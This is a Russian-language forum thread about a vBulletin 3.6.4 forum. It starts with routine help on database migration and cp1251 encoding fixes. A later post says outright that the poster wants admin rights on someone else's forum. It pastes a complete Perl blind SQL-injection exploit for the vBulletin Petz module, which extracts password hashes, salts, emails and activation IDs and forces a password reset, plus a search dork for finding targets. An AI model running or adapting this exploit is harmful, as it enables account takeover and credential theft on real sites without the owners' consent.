Просмотр полной версии : Нужна помощь с vBulletin
Такая проблема, сделал форум на vBulletin 3.6.4 на денвере все работает, перенес на сайт, пишет:
"Ошибка базы данных
В базе данных произошла ошибка."
Хостер поддерживает и php и mysql и т.д
Создавал базы данных на хостере, вбивал в конфиг.пхп и все равно не работает.
Потом нашел такой косяк что форум работает только с базой данный с названием "forum" другие не принимает, в чем проблема?
Моя icq: 244725
С меня + за помощь =)
Cawabunga
17.03.2008, 19:46
тут задай вопрос > vbsupport.org
Ты саму бд перенёс?
Я Бд не переносил, я новую создал на хостере!
Скачай заново булку и поставь ее
http://aeweb.ru/php_scripts/forums_php/42-vbulletin-3.6.8-rus.html
тут последняя версия
а старую удали и бд почисти
.:EnoT:.
17.03.2008, 20:01
Потом нашел такой косяк что форум работает только с базой данный с названием "forum" другие не принимает
Бред полный. Какое название таблицы укажешь, с такой он и будет работать.
Если ты имеешь ввиду префикс таблиц, то в конфиге можешь поменять.
Ещё у Булочки есть такая весчь, как порт, возможно проблема в нём, например у меня проблема была точно такая же...потом покопавшись оказалось, что на локалхосте при выставленном порте 3306 всё работало, а на хосте не пахало, поменял порт на 2082 и проблема решилась))
Просто я уже там сделал полностью весь форум со всеми категориями и т.д
Не хочу ставить новый и все делать заново!
Cawabunga
17.03.2008, 20:10
Я Бд не переносил, я новую создал на хостере!
Ну и что же ты ожидаешь ? Чтоб вб с пустой бд работал?
делай дамб базы на локалхосте под 1251, заливаешь на хост идешь в /includes/config.php
меняешь как надо
дамп phpmyadmin'om делать не советую
.:EnoT:.
17.03.2008, 20:21
дамп phpmyadmin'om делать не советую
жжошь)) а чем тебя дамп пхп-админа не устраивает интересно?))
недавно когда меня хостер прикрыл снял дамп пыадмином он **** покоцанную базу мне предоставил хорошо хоть админ хороший попался дал дамп снять с помощью sypex.net
Проблема с БД решилась, появилась новая, захожу на форум и там вместо русского текста "?????????????" перерыл все кодировки не одна не подходит, в чем проблема?
.:EnoT:.
17.03.2008, 21:47
ипааать...сделай дамп бд, потом через пхп_му_админ сделай дамп и поставь кодировку файла cp1251...у тебя щас база в utf кодировке
Cawabunga
17.03.2008, 21:59
В конфиге пропиши кодировку
Сделал то что сказал .:EnoT:. и Cawabunga и все равно ниче не поменялось =(
Cawabunga
17.03.2008, 22:49
Сделал то что сказал .:EnoT:. и Cawabunga и все равно ниче не поменялось =(
Руки не отуда ростут =\ нет бы уже по новой устоновить и мозги не кому не е...
includes/init.php
найти
// make $db a member of $vbulletin
$vbulletin->db =& $db;
После него вставить:
mysql_query("SET CHARACTER SET cp1251");
если не помогло :
mysql_query ("set character_set_client='cp1251'");
mysql_query ("set character_set_results='cp1251'");
mysql_query ("set collation_connection='cp1251_general_ci'");
Если и это не помогло > АП СТЕНКУ СО ВСЕЙ СИЛЫ ГОЛОВОЙ!
x3m-next
29.10.2008, 17:16
Всем привет кто может мне помочь хочу получить права админа одного форма начал читать читал и не в курил не че.Что я делаю не так ? ВОТ: узнал версию движка форма vBulletin 3.6.4 нащел под него експлоит :#!/usr/bin/perl
# Vbulletin module Petz with sql-injection.
# coded by k1b0rg(768620)
#
# This exploit changing your buyer.
# A new password consists of figures, the length of 8 and going to take a great brut of time(passwords pro);)
# If you do not need to change the password, simply stop exploit at the time of the removal of the password.
# Running exploit again sent two letters to the box. Be akkuratney.
# In the first test of vulnerability when sql error, the box webmaster sent a letter of error. Be akkuratney.
#
# dork: inurl:petz.php
#
# download module: http://dev.p3tz.com/
#
# Lamers go to жопа.
# exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1
#
# needly:
# mysql >=4
# magic_quotes off
# direct hands
#
# greets: antichat.ru mini-rinok.ru
#
use LWP::UserAgent;
use Getopt::Std;
use strict;
my %opts;
getopts("i:p:l:P:s:e:u:",%opts);
my $url=$opts{u};
my $id=$opts{i} || 9107;
my $prefix=$opts{P} || '';
my $password1=$opts{p};
my $salt1=$opts{s};
my $length=$opts{l};
my $email1=$opts{e};
if(!$url || !$id)
{
echo('-------------------------FUCK YOU SPILBERG!----------------------');
echo('Petz sql injection');
echo('Founded and coded by k1b0rg(768620)');
echo('exp: perl petz.pl -uhttp://forumteen.net/diendan/ -i1');
echo('-------------------------FUCK YOU SPILBERG!----------------------');
exit;
}
my $browser = LWP::UserAgent->new();
$browser->requests_redirectable([]);
echo('Petz sql injection');
echo('Founded and coded by k1b0rg(768620)');
########check on vuln and getting prefix#######################################
echo('[\] Step 0: [Checking vuln]');
my $res=$browser->get($url.'petz.php?do=view&id=9995681\'');
if($res->content=~/Database error/i)
{
echo('[|] This script is vulnerable!!!!');
$res->content=~/LEFT JOIN (.*?)user/i;
echo('[/] Prefix is: ['.$1.']');
}
else
{
echo('[|] This script NOT vulnerable!!!!');
exit;
}
########password1################################# ######
echo('[-] Step 1: [getting password(one) user by id ['.$id.']');
echo('[\] Password(1): [');
if(!$password1)
{
for(1..32)
{
my $pos=$_;
for(48..57,97..103)
{
my $asc=$_;
if($asc==103) {echo('EXPLOIT FAILED]',0); exit;}
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' user+WHERE+userid=\''.$id.'\'+and(ascii(substring( password,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); last; }
}
}
}
else
{
echo($password1,0);
}
echo(']',0);
########salt1##################################### ##
echo('[|] Step 2: [getting salt(one) user by id ['.$id.']');
echo('[-] Salt(1): [');
my $salt;
if(!$salt1)
{
for(1..3)
{
my $pos=$_;
for(33..126)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' user+WHERE+userid=\''.$id.'\'+and(ascii(substring( salt,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $salt.=chr($asc); last; }
}
}
}
else
{
$salt=$salt1;
echo($salt,0);
}
echo(']',0);
########Checking email length#######################################
echo('[\] Step 3: [Checking email length ['.$id.']');
echo('[|] Email length: [');
my $num;
if(!$email1)
{
if(!$length)
{
for(6..32)
{
$num=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' user+WHERE+userid=\''.$id.'\'+and(length(email)='. $num.')/*');
if($res->content!~/Untrapped Error/is) {echo($num,0); last; }
}
}
else
{
$num=$length;
echo($num,0);
}
}
else
{
$num=length($email1);
echo($num,0);
}
echo(']',0);
########losting email#######################################
echo('[/] Step 4: [getting email user by id ['.$id.']');
echo('[-] Email: [');
my $email;
if(!$email1)
{
for(1..$num)
{
my $pos=$_;
for(48..57,64,97..122)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' user+WHERE+userid=\''.$id.'\'+and(ascii(lower(subs tring(email,'.$pos.',1)))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $email.=chr($asc); last; }
}
}
}
else
{
$email=$email1;
echo($email,0);
}
echo(']',0);
########lost_password############################# ##########
echo('[\] Step 5: [Losting password]');
$browser->post($url.'login.php',
[
email=>$email,
do=>'emailpassword'
]);
########losting activationid###################################### #
echo('[|] Step 7: [getting activationid user by id ['.$id.']');
echo('[/] activationid: [');
my $valid;
for(1..8)
{
my $pos=$_;
for(48..57)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' useractivation+WHERE+userid=\''.$id.'\'+and(ascii( substring(activationid,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $valid.=chr($asc); last; }
}
}
echo(']',0);
########lost_password############################# ##########
echo('[-] Step 8: [Losting password]');
$browser->get($url.'login.php?a=pwd&u='.$id.'&i='.$valid);
########password2################################# ######
echo('[\] Step 9: [getting password(two) user by id ['.$id.']');
echo('[|] Password(2): [');
my $newhash;
for(1..32)
{
my $pos=$_;
for(48..57,97..102)
{
my $asc=$_;
my $res=$browser->get($url.'petz.php?do=stealitem&id=9995681\'+union+SELECT+666,666+FROM+'.$prefix.' user+WHERE+userid=\''.$id.'\'+and(ascii(substring( password,'.$pos.',1))='.$asc.')/*');
if($res->content!~/Untrapped Error/is) {echo(chr($asc),0); $newhash.=chr($asc); last; }
}
}
echo(']',0);
echo('News hash && salt: ['.$newhash.':'.$salt.']');
sub echo{
my $text=shift;
my $param=shift;
my $razdel=($param eq 0)?'':"\n";
syswrite STDOUT,$razdel.$text;
}
Далее переменовываю его в 1.pl
1) пуск->выполнить->cmd
2)cd\
3)cd c:\perl\bin
4)perl E:\1.pl www.forum/.....ru / 1 1
он мне пишит
------------------FUCK YOU SPILBERG!-------------------
Petz sql injection
Founded and coded by k1b0rg<768320>
exp:perl petz.pl -uhttp://forumteen.net/diendan/ i1
________________________________________
Что не так делаю помогите плиз
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot